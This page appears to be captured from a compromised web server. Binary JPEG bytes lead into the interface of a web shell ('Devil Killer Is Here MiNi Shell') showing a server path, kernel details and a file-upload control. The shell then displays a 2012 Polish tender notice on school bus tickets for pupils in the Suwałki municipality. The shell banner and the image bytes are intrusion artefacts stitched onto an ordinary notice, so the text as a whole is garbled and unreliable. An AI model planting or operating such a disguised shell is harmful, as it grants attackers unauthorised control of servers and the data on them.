JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/161855-N-2012.html

<p class="kh_header"><b>Suwałki: Dowóz uczniów i ich opiekunów zamieszkałych na terenie
gminy Suwałki do szkół w formie zakupu biletów miesięcznych</b><br>
<b>Numer ogłoszenia: 161855 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Ekonomiczno-Administracyjny Szkół w Suwałkach , ul. Kościuszki 71, 16-400 Suwałki, woj. podlaskie, tel. 87 5663121, faks 87 5663121.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów i ich opiekunów zamieszkałych na terenie
gminy Suwałki do szkół w formie zakupu biletów miesięcznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone jest w trybie przetargu nieograniczonego na podstawie art. 39 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.) zwanej dalej ustawą o wartości szacunkowej poniżej 200 000 Euro. Do czynności podejmowanych w trakcie niniejszego postępowania o udzielenie zamówienia publicznego stosuje się przepisy ustawy z dnia 29 stycznia 2004 r. prawo zamówień publicznych (t.j. Dz.U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz w sprawach nieuregulowanych ustawą przepisy ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz.U. nr 16, poz. 93 ze zm.).
Przedmiotem zamówienia jest dowiezienie i odwiezienie uczniów i ich opiekunów zamieszkałych na terenie gminy Suwałki do publicznych przedszkoli, oddziałów przedszkolnych lub innej formy wychowania przedszkolnego, szkół podstawowych
i gimnazjów poprzez sukcesywną dostawę-sprzedaż biletów miesięcznych w okresie
od 20 sierpnia 2012 r. do 5 grudnia 2012 r. wraz z zapewnieniem opieki podczas przewozu.
Przedmiot zamówienia dzieli się na poszczególne zadania:
1)	ZADANIE NR 1
Przedmiotem zamówienia jest dowiezienie i odwiezienie uczniów i ich opiekunów zamieszkałych na terenie gminy Suwałki do publicznych przedszkoli, oddziałów przedszkolnych lub innej formy wychowania przedszkolnego, szkół podstawowych
i gimnazjów poprzez sukcesywną dostawę-sprzedaż biletów miesięcznych w okresie
od 20 sierpnia 2012 r. do 5 grudnia 2012 r. wraz z zapewnieniem opieki podczas przewozu, zgodnie z warunkami zawartymi we wzorze umowy - stanowiącej załącznik nr 5 do SIWZ.

 
Zadanie obejmuje dowóz (D) i odwiezienie (O) uczniów szkół i ich rodziców na następujących trasach:
1.Bakaniuk - Suwałki Dworzec (D)
Suwałki Dworzec - Bakaniuk  (O) 1 uczeń*
2.Biała Woda Pętla - Suwałki Szpitalna (D)
Suwałki Szpitalna - Biała Woda Pętla(O) 1 uczniów*
3.Biała Woda Lasek  - Suwałki Dworzec (D)
Suwałki Dworzec - Biała Woda Lasek  (O) 2 uczniów*
4.Biała Woda Lasek - Suwałki Reja (D)
Suwałki Reja - Biała Woda Lasek (O) 2 uczniów*
5.Biała Woda Lasek - Suwałki Szpitalna (D)
Suwałki Szpitalna - Biała Woda Lasek (O) 1 uczeń*
6.Biała Woda Lasek - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda Lasek (D) 1 uczeń*
7.Biała Woda I - Suwałki Dworzec (O)
Suwałki Dworzec - Biała Woda I (D) 4 uczniów* i 1 opiekun*
8.Biała Woda I - Suwałki Reja (O)
Suwałki Reja - Biała Woda I (D) 1 uczeń*
9.Biała Woda I - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda I (D) 1 uczeń*
10.Biała Woda I - Suwałki Szpitalna(O)
 Suwałki Szpitalna - Biała Woda I (D) 1 uczeń*
11.Biała Woda II - Suwałki Dworzec (O)
Suwałki Dworzec - Biała Woda II (D) 1 uczeń *
12.Biała Woda II - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda II (D) 3 uczniów* i 1 opiekun*
13.Biała Woda II - Suwałki Szpitalna (O)
Suwałki Szpitalna - Biała Woda II (D) 2 uczniów*
14.Biała Woda II - Suwałki Reja (O)
Suwałki Reja - Biała Woda II (D) 1 uczeń*
15.Biała Woda III - Suwałki Dworzec (O)
Suwałki Dworzec - Biała Woda III (D) 1 uczeń*
16.Biała Woda III - Suwałki Szpitalna (O)
Suwałki Szpitalna - Biała Woda III (D) 1 uczeń*
17.Biała Woda III - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda III (D) 1 uczeń*
18.Biała Woda III - Suwałki Reja (O)
Suwałki Reja - Biała Woda III (D) 1 uczeń*
19.Bród Stary - Suwałki Szpitalna (O)
Suwałki Szpitalna - Bród Stary (D) 13 uczniów*
20.Burdeniszki - Stary Folwark (O)
Stary Folwark - Burdeniszki (D) 17 uczniów* 1 uczeń niepełnosprawny* 1 opiekun*
21.Czarnakowizna - Suwałki Dworzec (O)
Suwałki Dworzec - Czarnakowizna (D) 3 uczniów*
22.Czarnakowizna - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Czarnakowizna (D) 3 uczniów*
23.Czerwony Folwark - Stary Folwark (O)
Stary Folwark - Czerwony Folwark (D) 3 uczniów*
24.Korkliny - Suwałki Dworzec (O)
Suwałki Dworzec - Kuków Folwark (D) 4 uczniów*
25.Korkliny - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korkliny (D) 2 uczniów*
26.Korkliny 1 - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korkliny 1 (D) 2 uczniów*
27.Korobiec - Suwałki Dworzec (O)
Suwałki Dworzec - Korobiec (D) 1 uczeń*
28.Korobiec - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korobiec (D) 6 uczniów*
29.Korobiec 1 - Suwałki Dworzec (O)
Suwałki Dworzec - Korobiec 1 (D) 1 uczeń*
30.Korobiec 1 - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korobiec 1 (D) 2 uczniów*
31.Kuków-Folwark - Suwałki Dworzec (O)
Suwałki Dworzec - Kuków-Folwark (D) 4 uczniów*
32.Kuków-Folwark - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Kuków-Folwark (D) 12 uczniów* i 5 opiekunów*
33.Lipniak - Kaletnik (O)
Kaletnik - Lipniak (D) 2 uczniów*
34.Mały Bród - Suwałki Dworzec (O)
Suwałki Dworzec - Mały Bród (D) 1 uczeń* i 1 opiekun*
35.Mały Bród - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Mały Bród (D) 2 uczniów* i 1 opiekun*
36.Osowa - Suwałki Dworzec (O)
Suwałki Dworzec - Osowa (D) 3 uczniów*
37.Osowa - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Osowa (D) 2 uczniów*
38.Potasznia - Suwałki Dworzec (O)
Suwałki Dworzec - Potasznia (D) 1 uczeń*
39.Płociczno PKP - Płociczno-Tartak (O)
Płociczno-Tartak - Płociczno PKP (D) 1 uczeń*
40.Potasznia - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Potasznia (D) 3 uczniów* i 2 opiekunów*
41.Potasznia - Suwałki Szpitalna (O)
Suwałki Szpitalna - Potasznia (D) 27 uczniów* i 1 opiekun*
42.Potasznia Kolonie - Suwałki Dworzec (O)
Suwałki Dworzec - Potasznia Kolonie (D) 1 uczeń*
43.Taciewo - Suwałki Dworzec (O)
Suwałki Dworzec - Taciewo (D) 1 uczeń*
44.Taciewo - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Taciewo (D) 5 uczniów* i 1 opiekun*
45.Taciewo SK - Suwałki Dworzec (O)
Suwałki Dworzec - Taciewo SK (D) 1 uczeń*
46.Taciewo SK - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Taciewo SK (D) 2 uczniów*
47.Turówka - Suwałki Dworzec (O)
Suwałki Dworzec - Turówka (D) 2 uczniów*
48.Turówka - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Turówka (D) 9 uczniów* i 1 opiekun*
49.Turówka Stara - Suwałki Dworzec (O)
Suwałki Dworzec - Turówka Stara (D) 2 uczniów*
50.Turówka Stara - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Turówka Stara (D) 3 uczniów* i 1 opiekun*
51.Wiatrołuża Pierwsza - Kaletnik (O)
Kaletnik - Wiatrołuża Pierwsza (D) 4 uczniów*
52.Zielone Kamedulskie Osiedle - Przebród Szkoła (O)
Przebród Szkoła - Zielone Kamedulskie Osiedle (D) 28 uczniów*
*orientacyjna liczba uczniów i opiekunów podana na podstawie największej liczby dowożonych na poszczególnych trasach w okresie od 01.06.2011 r. do 31.05.2012 roku. Podkreślone ilości dojeżdżających na poszczególnych trasach oznaczają przewidywane ilości wynikające z wykazów uczniów na rok szkolny 2012/2013. Liczba uczniów i opiekunów na poszczególnych trasach może ulec zmianie i zostanie zaktualizowana przy pierwszym zamówieniu na rok szkolny 2012/2013 na podstawie wykazów otrzymanych ze szkół.
SK oznacza skrzyżowanie.
Zamawiający przed rozpoczęciem wykonywania zadań (w danym miesiącu) dostarczy Wykonawcy imienną listę uczniów i ich opiekunów, godziny odjazdów i wyjazdów wraz 
z wykazem tras, na które Wykonawca dostarczy bilety miesięczne. 
W okresach zimowych pojazdy dowożące dzieci muszą być ogrzewane.
W przypadku awarii wyznaczonego autobusu Wykonawca zapewni pojazd zastępczy spełniający właściwe wymagania techniczne w ruchu drogowym.
Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny 
w trakcie wsiadania, wysiadania i przejazdu uczniów, która jest niezbędna przy tego rodzaju przewozach.
Usługa transportowa świadczona będzie przez Wykonawcę w dni powszednie
z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw
w realizacji zajęć dydaktyczno-wychowawczych, określonych w rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz.U. Nr 46, poz. 432 ze zm.).

2)	ZADANIE NR 2
Przedmiotem zamówienia jest dowiezienie i odwiezienie uczniów i ich opiekunów zamieszkałych na terenie gminy Suwałki do publicznych przedszkoli, oddziałów przedszkolnych lub innej formy wychowania przedszkolnego, szkół podstawowych
i gimnazjów poprzez sukcesywną dostawę-sprzedaż biletów miesięcznych w okresie
od 20 sierpnia 2012 r. do 5 grudnia 2012 r. wraz z zapewnieniem opieki podczas przewozu, zgodnie z warunkami zawartymi we wzorze umowy - stanowiącej załącznik nr 6 do SIWZ. 
Zadanie obejmuje dowóz (D) i odwiezienie (O) uczniów szkół i ich rodziców na następujących trasach:

1.Buczka  - Suwałki (D)
Suwałki - Buczka (O)  1 uczeń*
2.Jasionowo - Suwałki (D)
Suwałki - Jasionowo (O) 22 uczniów* i 1 opiekun*
3.Krzywe - Suwałki (D)
Suwałki - Krzywe (O) 60 uczniów* i 4 opiekunów*
4.Lipniak - Nowa Wieś (D)
Nowa Wieś - Lipniak (O) 3 uczniów*
5.Lipniak - Suwałki (D)
Suwałki - Lipniak (O) 7 uczniów*
6.Mała Huta - Suwałki (D)
Suwałki - Mała Huta (O) 29 uczniów* i 2 opiekunów*
7.Nowa Wieś - Suwałki (D)
Suwałki - Nowa Wieś (O) 23 uczniów*
8.Okuniowiec - Nowa Wieś (D)
Nowa Wieś - Okuniowiec (O) 5 uczniów*
9.Okuniowiec - Suwałki (D)
Suwałki - Okuniowiec(O) 22 uczniów*
10.Płociczno-Osiedle - Suwałki (D)
Suwałki - Płociczno-Osiedle (O) 3 uczniów*
11.Płociczno-Tartak - Suwałki (D)
Suwałki - Płociczno-Tartak (O) 2 uczniów* 
12.Poddubówek - Suwałki (D)
Suwałki - Poddubówek (O) 16 uczniów*
13.	Przebród - Suwałki (D)
Suwałki - Przebród (O) 2 uczniów*
14.	Sobolewo - Płociczno-Tartak (D)
Płociczno-Tartak - Sobolewo (O) 32 uczniów* i 1 opiekun*
15.	Wychodne - Suwałki (D)
Suwałki - Wychodne (O) 1 uczeń*
16.	Zielone Królewskie - Suwałki (D)
Suwałki - Zielone Królewskie (O) 4 uczniów*
17.	Zielone Kamedulskie - Suwałki (D)
Suwałki - Zielone Kamedulskie (O) 1 uczeń* i 1 opiekun*
* orientacyjna liczba uczniów i opiekunów podana na podstawie największej liczby dowożonych na poszczególnych trasach w okresie od 01.06.2011 r. do 31.05.2012 roku. Podkreślone ilości dojeżdżających na poszczególnych trasach oznaczają przewidywane ilości wynikające z wykazów uczniów na rok szkolny 2012/2013. Liczba uczniów i opiekunów na poszczególnych trasach może ulec zmianie i zostanie zaktualizowana przy pierwszym zamówieniu na rok szkolny 2012/2013 na podstawie wykazów otrzymanych ze szkół.
Zamawiający przed rozpoczęciem wykonywania zadań (w danym miesiącu) dostarczy Wykonawcy imienną listę uczniów i ich opiekunów, godziny odjazdów i wyjazdów wraz 
z wykazem tras, na które Wykonawca dostarczy bilety miesięczne. 
W okresach zimowych pojazdy dowożące dzieci muszą być ogrzewane.
W przypadku awarii wyznaczonego autobusu Wykonawca zapewni pojazd zastępczy spełniający właściwe wymagania techniczne w ruchu drogowym.
Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny 
w trakcie wsiadania, wysiadania i przejazdu uczniów, która jest niezbędna przy tego rodzaju przewozach.
Usługa transportowa świadczona będzie przez Wykonawcę w dni powszednie
z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw
w realizacji zajęć dydaktyczno-wychowawczych, określonych w rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz.U. Nr 46, poz. 432 ze zm.).
Dopuszcza się składanie ofert częściowych na poszczególne zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy. Do 10 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie pobiera się.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia i dokumentów określonych w cz. VII ust. 1, pkt 1 i 2 SIWZ. Ocena spełniania warunków udziału w postępowaniu nastąpi według formuły: spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w cz. VII, ust.1, pkt 1 SIWZ. Ocena spełniania warunków udziału w postępowaniu nastąpi według formuły: spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w cz. VII ust. 1, pkt 1 SIWZ oraz złożenie dokumentów określonych w cz. VII , ust.1, pkt 3 SIWZ. Ocena spełniania warunków udziału w postępowaniu nastąpi według formuły: spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w cz. VII, ust. 1, pkt 1 SIWZ. Ocena spełniania warunków udziału w postępowaniu nastąpi według formuły: spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w cz. VII, ust. 1, pkt 1 SIWZ oraz złożenie dokumentów określonych w cz. VII, ust.1, pkt 4  SIWZ. Ocena spełniania warunków udziału w postępowaniu nastąpi według formuły: spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie.

2.	Wzory umów stanowią załączniki nr 5 lub 6 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.

3.	Umowa zostanie aneksowana w przypadku zwiększenia się/zmniejszenia liczby dowożonych i odwożonych uczniów i ich opiekunów wynikających z naturalnych ruchów w trakcie trwania umowy. Zmiana umowy następuje na warunkach określonych
w przetargu i na podstawie cen wystawionych biletów miesięcznych na poszczególnych trasach.

4.	Ceny jednostkowe określone przez Wykonawcę mogą ulec zmianie tylko w uzasadnionych przypadkach, nie więcej niż o wskaźniki prognozowane na dany rok tj. średnioroczny wskaźnik cen towarów i usług konsumpcyjnych ogółem na rok 2012.

